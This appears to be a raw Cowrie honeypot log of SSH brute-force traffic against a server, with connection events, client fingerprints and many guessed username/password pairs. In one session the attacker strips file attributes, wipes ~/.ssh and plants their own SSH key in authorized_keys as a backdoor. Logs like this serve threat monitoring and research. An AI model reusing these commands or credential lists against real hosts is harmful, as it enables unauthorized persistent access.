{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:51:50.215019Z","src_ip":"212.227.235.229","session":"0e387e372c02"}
{"eventid":"cowrie.login.success","username":"root","password":"Qaz123456@","message":"login attempt [root/Qaz123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:51:51.339177Z","src_ip":"212.227.235.229","session":"0e387e372c02"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:51:51.901011Z","src_ip":"212.227.235.229","session":"0e387e372c02"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:51:51.901753Z","src_ip":"212.227.235.229","session":"0e387e372c02"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:51:51.902944Z","src_ip":"212.227.235.229","session":"0e387e372c02"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:52.174370Z","src_ip":"212.227.235.229","session":"0e387e372c02"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:51:53.170226Z","src_ip":"212.227.235.229","session":"0e387e372c02"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:51:53.170929Z","src_ip":"212.227.235.229","session":"0e387e372c02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45254,"dst_ip":"1.2.3.4","dst_port":22,"session":"73bc41089f69","protocol":"ssh","message":"New connection: 212.227.125.160:45254 (1.2.3.4:22) [session: 73bc41089f69]","sensor":"my-vps","timestamp":"2025-08-31T05:51:53.173255Z"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:51:53.443112Z","src_ip":"212.227.235.229","session":"0e387e372c02"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:53.444053Z","src_ip":"212.227.235.229","session":"0e387e372c02"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:51:53.577379Z","src_ip":"212.227.125.160","session":"73bc41089f69"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:51:53.578618Z","src_ip":"212.227.125.160","session":"73bc41089f69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59652,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab9073a9900a","protocol":"ssh","message":"New connection: 212.227.235.229:59652 (1.2.3.4:22) [session: ab9073a9900a]","sensor":"my-vps","timestamp":"2025-08-31T05:51:53.714530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:51:53.715417Z","src_ip":"212.227.235.229","session":"ab9073a9900a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45114,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5645aaad614","protocol":"ssh","message":"New connection: 212.227.125.160:45114 (1.2.3.4:22) [session: d5645aaad614]","sensor":"my-vps","timestamp":"2025-08-31T05:51:53.940245Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:51:53.986756Z","src_ip":"212.227.235.229","session":"ab9073a9900a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:51:55.111541Z","src_ip":"212.227.235.229","session":"ab9073a9900a"}
{"eventid":"cowrie.login.failed","username":"test2","password":"P@ssw0rd123","message":"login attempt [test2/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:51:55.584719Z","src_ip":"212.227.125.160","session":"73bc41089f69"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":40398,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c128b6a426f","protocol":"ssh","message":"New connection: 43.159.36.188:40398 (1.2.3.4:22) [session: 5c128b6a426f]","sensor":"my-vps","timestamp":"2025-08-31T05:51:55.774456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:51:55.775118Z","src_ip":"43.159.36.188","session":"5c128b6a426f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:51:56.016410Z","src_ip":"43.159.36.188","session":"5c128b6a426f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:56.384817Z","src_ip":"212.227.235.229","session":"ab9073a9900a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59666,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec0d71313f70","protocol":"ssh","message":"New connection: 212.227.235.229:59666 (1.2.3.4:22) [session: ec0d71313f70]","sensor":"my-vps","timestamp":"2025-08-31T05:51:56.657665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:51:56.658488Z","src_ip":"212.227.235.229","session":"ec0d71313f70"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:51:56.931722Z","src_ip":"212.227.235.229","session":"ec0d71313f70"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:56.933398Z","src_ip":"212.227.125.160","session":"73bc41089f69"}
{"eventid":"cowrie.login.failed","username":"grid","password":"grid","message":"login attempt [grid/grid] failed","sensor":"my-vps","timestamp":"2025-08-31T05:51:57.021670Z","src_ip":"43.159.36.188","session":"5c128b6a426f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:51:58.066865Z","src_ip":"212.227.235.229","session":"ec0d71313f70"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:58.269850Z","src_ip":"43.159.36.188","session":"5c128b6a426f"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:58.340295Z","src_ip":"212.227.235.229","session":"0e387e372c02"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:58.341362Z","src_ip":"212.227.235.229","session":"ec0d71313f70"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:51:58.411221Z","src_ip":"212.227.235.229","session":"97f319a83918"}
{"eventid":"cowrie.session.closed","duration":"31.3","message":"Connection lost after 31.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:58.611746Z","src_ip":"212.227.235.229","session":"6979a3344833"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:58.618973Z","src_ip":"212.227.235.229","session":"97f319a83918"}
{"eventid":"cowrie.session.connect","src_ip":"120.27.154.152","src_port":40296,"dst_ip":"1.2.3.4","dst_port":22,"session":"3eb8bd5af467","protocol":"ssh","message":"New connection: 120.27.154.152:40296 (1.2.3.4:22) [session: 3eb8bd5af467]","sensor":"my-vps","timestamp":"2025-08-31T05:52:02.361284Z"}
{"eventid":"cowrie.session.closed","duration":46.22228407859802,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:02.506784Z","src_ip":"212.227.235.229","session":"aab9aac7384f"}
{"eventid":"cowrie.session.closed","duration":46.22148633003235,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:02.528286Z","src_ip":"212.227.235.229","session":"0478a1518a47"}
{"eventid":"cowrie.session.closed","duration":46.25181245803833,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:03.494763Z","src_ip":"103.77.214.206","session":"61e84d78c903"}
{"eventid":"cowrie.session.closed","duration":46.27127718925476,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:06.554482Z","src_ip":"103.77.214.206","session":"0dfc2102a138"}
{"eventid":"cowrie.session.closed","duration":"20.8","message":"Connection lost after 20.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:14.714126Z","src_ip":"212.227.125.160","session":"d5645aaad614"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":48502,"dst_ip":"1.2.3.4","dst_port":22,"session":"44514dc9b176","protocol":"ssh","message":"New connection: 170.64.166.123:48502 (1.2.3.4:22) [session: 44514dc9b176]","sensor":"my-vps","timestamp":"2025-08-31T05:52:18.718780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:52:18.719741Z","src_ip":"170.64.166.123","session":"44514dc9b176"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:52:18.994771Z","src_ip":"170.64.166.123","session":"44514dc9b176"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"!@#qweASD123","message":"login attempt [postgres/!@#qweASD123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:52:20.135273Z","src_ip":"170.64.166.123","session":"44514dc9b176"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58670,"dst_ip":"1.2.3.4","dst_port":22,"session":"769a5341251e","protocol":"ssh","message":"New connection: 212.227.235.229:58670 (1.2.3.4:22) [session: 769a5341251e]","sensor":"my-vps","timestamp":"2025-08-31T05:52:20.718078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:52:20.719924Z","src_ip":"212.227.235.229","session":"769a5341251e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:52:21.006944Z","src_ip":"212.227.235.229","session":"769a5341251e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:21.412002Z","src_ip":"170.64.166.123","session":"44514dc9b176"}
{"eventid":"cowrie.login.failed","username":"noc","password":"P@ssw0rd","message":"login attempt [noc/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T05:52:22.196884Z","src_ip":"212.227.235.229","session":"769a5341251e"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:23.486127Z","src_ip":"212.227.235.229","session":"769a5341251e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T05:52:27.724159Z","src_ip":"212.227.235.229","session":"92ca25f17726"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33352,"dst_ip":"1.2.3.4","dst_port":22,"session":"49d7a2e2cbf9","protocol":"ssh","message":"New connection: 212.227.235.229:33352 (1.2.3.4:22) [session: 49d7a2e2cbf9]","sensor":"my-vps","timestamp":"2025-08-31T05:52:30.039489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:52:30.727818Z","src_ip":"212.227.235.229","session":"49d7a2e2cbf9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:52:30.728534Z","src_ip":"212.227.235.229","session":"49d7a2e2cbf9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59014,"dst_ip":"1.2.3.4","dst_port":22,"session":"387e5359a135","protocol":"ssh","message":"New connection: 212.227.235.229:59014 (1.2.3.4:22) [session: 387e5359a135]","sensor":"my-vps","timestamp":"2025-08-31T05:52:31.786329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:52:31.788457Z","src_ip":"212.227.235.229","session":"387e5359a135"}
